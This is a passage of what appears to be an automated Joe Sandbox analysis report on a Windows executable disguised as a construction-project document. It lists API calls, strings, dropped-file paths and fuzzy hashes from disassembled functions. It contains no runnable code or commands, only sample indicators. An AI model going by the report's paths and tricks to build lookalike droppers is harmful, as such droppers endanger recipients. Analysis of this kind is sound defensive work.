                                                                                                                          • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404CDD
                                                                                                                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404D73
                                                                                                                          • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404D9E
                                                                                                                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404DB2
                                                                                                                          • GetWindowLongW.USER32(?,?), ref: 00404DE1
                                                                                                                          • SetWindowLongW.USER32(?,?,00000000), ref: 00404DEF
                                                                                                                          • ShowWindow.USER32(?,00000005), ref: 00404E00
                                                                                                                          • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404EFD
                                                                                                                          • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404F62
                                                                                                                          • SendMessageW.USER32(?,?,00000000,00000000), ref: 00404F77
                                                                                                                          • SendMessageW.USER32(?,00000420,00000000,?), ref: 00404F9B
                                                                                                                          • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404FBB
                                                                                                                          • ImageList_Destroy.COMCTL32(?), ref: 00404FD0
                                                                                                                          • GlobalFree.KERNEL32(?), ref: 00404FE0
                                                                                                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405059
                                                                                                                          • SendMessageW.USER32(?,00001102,?,?), ref: 00405102
                                                                                                                          • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00405111
                                                                                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 00405131
                                                                                                                          • ShowWindow.USER32(?,00000000), ref: 0040517F
                                                                                                                          • GetDlgItem.USER32(?,000003FE), ref: 0040518A
                                                                                                                          • ShowWindow.USER32(00000000), ref: 00405191
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1964758426.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1964746569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964771542.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964868103.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                          • String ID: $M$N
                                                                                                                          • API String ID: 1638840714-813528018
                                                                                                                          • Opcode ID: f7ebdd8b268411a9b37aa70f9024469a2a71c778bc2b79fb1238a5057d52bc19
                                                                                                                          • Instruction ID: 03f87516f98afcaf774383f7594fe685c09e1d2031758133a9bfc9c340c12758
                                                                                                                          • Opcode Fuzzy Hash: f7ebdd8b268411a9b37aa70f9024469a2a71c778bc2b79fb1238a5057d52bc19
                                                                                                                          • Instruction Fuzzy Hash: 2E026DB0A00209EFEB209F54DD85AAE7BB5FB44354F10857AF610BA2E1C7789D52CF58
                                                                                                                          Function 00404635 Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 275stringCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GetDlgItem.USER32(?,000003FB), ref: 00404684
                                                                                                                          • SetWindowTextW.USER32(00000000,?), ref: 004046AE
                                                                                                                          • SHBrowseForFolderW.SHELL32(?), ref: 0040475F
                                                                                                                          • CoTaskMemFree.OLE32(00000000), ref: 0040476A
                                                                                                                          • lstrcmpiW.KERNEL32(Call,004226E8,00000000,?,?), ref: 0040479C
                                                                                                                          • lstrcatW.KERNEL32(?,Call), ref: 004047A8
                                                                                                                          • SetDlgItemTextW.USER32(?,000003FB,?), ref: 004047BA
                                                                                                                            • Part of subcall function 0040574C: GetDlgItemTextW.USER32(?,?,00000400,004047F1), ref: 0040575F
                                                                                                                            • Part of subcall function 00406220: CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403332,C:\Users\user\AppData\Local\Temp\,74DF3420,00403542), ref: 00406283
                                                                                                                            • Part of subcall function 00406220: CharNextW.USER32(?,?,?,00000000), ref: 00406292
                                                                                                                            • Part of subcall function 00406220: CharNextW.USER32(?,"C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403332,C:\Users\user\AppData\Local\Temp\,74DF3420,00403542), ref: 00406297
                                                                                                                            • Part of subcall function 00406220: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403332,C:\Users\user\AppData\Local\Temp\,74DF3420,00403542), ref: 004062AA
                                                                                                                          • GetDiskFreeSpaceW.KERNEL32(004206B8,?,?,0000040F,?,004206B8,004206B8,?,00000000,004206B8,?,?,000003FB,?), ref: 0040487C
                                                                                                                          • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404897
                                                                                                                            • Part of subcall function 004049F0: lstrlenW.KERNEL32(004226E8,004226E8,?,%u.%u%s%s,00000005,00000000,00000000,?,?,00000000,?,000000DF,00000000,00000400,?), ref: 00404A91
                                                                                                                            • Part of subcall function 004049F0: wsprintfW.USER32 ref: 00404A9A
                                                                                                                            • Part of subcall function 004049F0: SetDlgItemTextW.USER32(?,004226E8), ref: 00404AAD
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1964758426.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1964746569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964771542.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964868103.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                                                          • String ID: A$C:\Users\user\AppData\Roaming\incontemptible\koput$Call$&B
                                                                                                                          • API String ID: 2624150263-312744033
                                                                                                                          • Opcode ID: 114b84ffbc372fa177182272010cbbd35a60563a0620183ccf333a24de688714
                                                                                                                          • Instruction ID: 99b17f69f627c4fe70adaab035ba94d9a502da106e2b73a6a76b2d9e8e29038f
                                                                                                                          • Opcode Fuzzy Hash: 114b84ffbc372fa177182272010cbbd35a60563a0620183ccf333a24de688714
                                                                                                                          • Instruction Fuzzy Hash: ECA170B1A00209ABDB11AFA5DC85AAF77B8EF85714F10843BF601B62D1D77C89418F69
                                                                                                                          Function 0040206A Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 123comCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • CoCreateInstance.OLE32(00407474,?,00000001,00407464,?,00000000,00000045,000000CD,00000002,000000DF,?), ref: 004020BD
                                                                                                                          Strings
                                                                                                                          • C:\Users\user\AppData\Roaming\incontemptible\koput\Losser, xrefs: 004020FB
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1964758426.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1964746569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964771542.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964868103.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CreateInstance
                                                                                                                          • String ID: C:\Users\user\AppData\Roaming\incontemptible\koput\Losser
                                                                                                                          • API String ID: 542301482-1365608561
                                                                                                                          • Opcode ID: 330b72db69b131769a7f43a84d7f99a236d9a4fefb58777c6ca7a9fe0b558edb
                                                                                                                          • Instruction ID: b1e6e5a65ced1a5d956167907e7332dfeee254deeda5808785c26b13febdce63
                                                                                                                          • Opcode Fuzzy Hash: 330b72db69b131769a7f43a84d7f99a236d9a4fefb58777c6ca7a9fe0b558edb
                                                                                                                          • Instruction Fuzzy Hash: 2D415F75A00105BFCB00DFA4C988EAE7BB5BF49318B20416AF505EF2D1D679AD41CB54
                                                                                                                          Function 00402770 Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040277F
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1964758426.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1964746569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964771542.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964868103.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: FileFindFirst
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1974802433-0
                                                                                                                          • Opcode ID: de465c75c13fed098f87d81826f668e350bd36b98d1664987cc769742e30aac0
                                                                                                                          • Instruction ID: 2767565cf4098148965081e12a0ae643aa49ff73535e0165105732fd86b2d8f1
                                                                                                                          • Opcode Fuzzy Hash: de465c75c13fed098f87d81826f668e350bd36b98d1664987cc769742e30aac0
                                                                                                                          • Instruction Fuzzy Hash: 4DF05EB56101149BCB00DBA4DD499AEB378FF04318F30497AE151F31D0D6B859409B3A
                                                                                                                          Function 00404337 Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 207windowstringCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 004043D5
                                                                                                                          • GetDlgItem.USER32(?,000003E8), ref: 004043E9
                                                                                                                          • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404406
                                                                                                                          • GetSysColor.USER32(?), ref: 00404417
                                                                                                                          • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404425
                                                                                                                          • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 00404433
                                                                                                                          • lstrlenW.KERNEL32(?), ref: 00404438
                                                                                                                          • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404445
                                                                                                                          • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 0040445A
                                                                                                                          • GetDlgItem.USER32(?,0000040A), ref: 004044B3
                                                                                                                          • SendMessageW.USER32(00000000), ref: 004044BA
                                                                                                                          • GetDlgItem.USER32(?,000003E8), ref: 004044E5
                                                                                                                          • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404528
                                                                                                                          • LoadCursorW.USER32(00000000,00007F02), ref: 00404536
                                                                                                                          • SetCursor.USER32(00000000), ref: 00404539
                                                                                                                          • ShellExecuteW.SHELL32(0000070B,open,004271A0,00000000,00000000,00000001), ref: 0040454E
                                                                                                                          • LoadCursorW.USER32(00000000,00007F00), ref: 0040455A
                                                                                                                          • SetCursor.USER32(00000000), ref: 0040455D
                                                                                                                          • SendMessageW.USER32(00000111,00000001,00000000), ref: 0040458C
                                                                                                                          • SendMessageW.USER32(?,00000000,00000000), ref: 0040459E
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1964758426.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1964746569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964771542.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964868103.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                                                                                          • String ID: Call$N$open
                                                                                                                          • API String ID: 3615053054-2563687911
                                                                                                                          • Opcode ID: 3a3e15a46bcef9b8006e363d6ddaa5c0bc478510f2ba28bfd0355cb20498c547
                                                                                                                          • Instruction ID: ef3aff8114c15a744cba6b044a82d146c21238a9e490568bd42f4e53aa973cae
                                                                                                                          • Opcode Fuzzy Hash: 3a3e15a46bcef9b8006e363d6ddaa5c0bc478510f2ba28bfd0355cb20498c547
                                                                                                                          • Instruction Fuzzy Hash: CF718FB1A00209FFDB109F60DD85A6A7BA9FB94344F00853AFB01B62D1C778AD51CF99
                                                                                                                          Function 00405CAA Relevance: 26.4, APIs: 12, Strings: 3, Instructions: 136stringmemoryfileCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • lstrcpyW.KERNEL32(00425D88,NUL,?,00000000,?,?,?,00405E4E,?,?,00000001,004059C6,?,00000000,000000F1,?), ref: 00405CBA
                                                                                                                          • CloseHandle.KERNEL32(00000000,00000000,00000000,00000001,?,?,?,00405E4E,?,?,00000001,004059C6,?,00000000,000000F1,?), ref: 00405CDE
                                                                                                                          • GetShortPathNameW.KERNEL32(00000000,00425D88,00000400), ref: 00405CE7
                                                                                                                            • Part of subcall function 00405B5D: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405D97,00000000,[Rename],00000000,00000000,00000000), ref: 00405B6D
                                                                                                                            • Part of subcall function 00405B5D: lstrlenA.KERNEL32(00405D97,?,00000000,00405D97,00000000,[Rename],00000000,00000000,00000000), ref: 00405B9F
                                                                                                                          • GetShortPathNameW.KERNEL32(?,00426588,00000400), ref: 00405D04
                                                                                                                          • wsprintfA.USER32 ref: 00405D22
                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000,00426588,C0000000,?,00426588,?,?,?,?,?), ref: 00405D5D
                                                                                                                          • GlobalAlloc.KERNEL32(?,0000000A), ref: 00405D6C
                                                                                                                          • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000), ref: 00405DA4
                                                                                                                          • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,00000000,00425988,00000000,-0000000A,00409560,00000000,[Rename],00000000,00000000,00000000), ref: 00405DFA
                                                                                                                          • WriteFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00405E0C
                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 00405E13
                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00405E1A
                                                                                                                            • Part of subcall function 00405BF8: GetFileAttributesW.KERNELBASE(00000003,00402DFF,C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe,80000000,00000003), ref: 00405BFC
                                                                                                                            • Part of subcall function 00405BF8: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405C1E
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1964758426.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1964746569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964771542.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964868103.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizeWritewsprintf
                                                                                                                          • String ID: %ls=%ls$NUL$[Rename]
                                                                                                                          • API String ID: 1265525490-899692902
                                                                                                                          • Opcode ID: a8d6815e5da54145bc517d01fd16b8e1ff93f39a7c8dcdb8ac9fdc12244dbea1
                                                                                                                          • Instruction ID: 278018eb507e55e18bba05fe136388c5c8d345875c3a2ef582da275f9efe5ed0
                                                                                                                          • Opcode Fuzzy Hash: a8d6815e5da54145bc517d01fd16b8e1ff93f39a7c8dcdb8ac9fdc12244dbea1
                                                                                                                          • Instruction Fuzzy Hash: 4C410F71604B19BFD2206B61AC4DF6B3A6CDF45754F14053BB901F62C2EA38A9018ABD
                                                                                                                          Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                          • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                          • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                                          • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                                          • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                                          • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                                          • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                                                          • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                                                          • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                                          • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                                          • DrawTextW.USER32(00000000,00428200,000000FF,00000010,00000820), ref: 00401156
                                                                                                                          • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                                          • DeleteObject.GDI32(?), ref: 00401165
                                                                                                                          • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1964758426.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1964746569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964771542.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964868103.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                          • String ID: F
                                                                                                                          • API String ID: 941294808-1304234792
                                                                                                                          • Opcode ID: c8f07ac8fddda19ee2bf7cb4f90658f54556206f608d49a47768e3a2d0e378b6
                                                                                                                          • Instruction ID: fcf32cd20748a1213536d9d4e972d5f65e682a1af5e7fde79162f5b09e182029
                                                                                                                          • Opcode Fuzzy Hash: c8f07ac8fddda19ee2bf7cb4f90658f54556206f608d49a47768e3a2d0e378b6
                                                                                                                          • Instruction Fuzzy Hash: D2418B71804249AFCB058FA5DD459BFBBB9FF44310F00852AF561AA1A0C738EA51DFA5
                                                                                                                          Function 100022D0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136memoryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 10002416
                                                                                                                            • Part of subcall function 1000122C: lstrcpynW.KERNEL32(00000000,?,100012DF,00000019,100011BE,-000000A0), ref: 1000123C
                                                                                                                          • GlobalAlloc.KERNEL32(?), ref: 10002397
                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 100023B2
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1968028222.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1968005131.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1968042023.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1968066421.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_10000000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                                                                                                          • String ID: @Hmu
                                                                                                                          • API String ID: 4216380887-887474944
                                                                                                                          • Opcode ID: 3b2da28fc6c9bb4151d71d136a2166c584fe2e1793c0aa67a83c17282771645f
                                                                                                                          • Instruction ID: a8798eece1b67337def5fc6f06e905ed3cc6fca3e5836deafc22007a072d802d
                                                                                                                          • Opcode Fuzzy Hash: 3b2da28fc6c9bb4151d71d136a2166c584fe2e1793c0aa67a83c17282771645f
                                                                                                                          • Instruction Fuzzy Hash: A14190B1508305EFF320DF24D885AAA77F8FB883D0F50452DF9468619ADB34AA54DB61
                                                                                                                          Function 00406220 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403332,C:\Users\user\AppData\Local\Temp\,74DF3420,00403542), ref: 00406283
                                                                                                                          • CharNextW.USER32(?,?,?,00000000), ref: 00406292
                                                                                                                          • CharNextW.USER32(?,"C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403332,C:\Users\user\AppData\Local\Temp\,74DF3420,00403542), ref: 00406297
                                                                                                                          • CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403332,C:\Users\user\AppData\Local\Temp\,74DF3420,00403542), ref: 004062AA
                                                                                                                          Strings
                                                                                                                          • *?|<>/":, xrefs: 00406272
                                                                                                                          • "C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe", xrefs: 00406264
                                                                                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00406221, 00406226
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1964758426.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1964746569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964771542.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
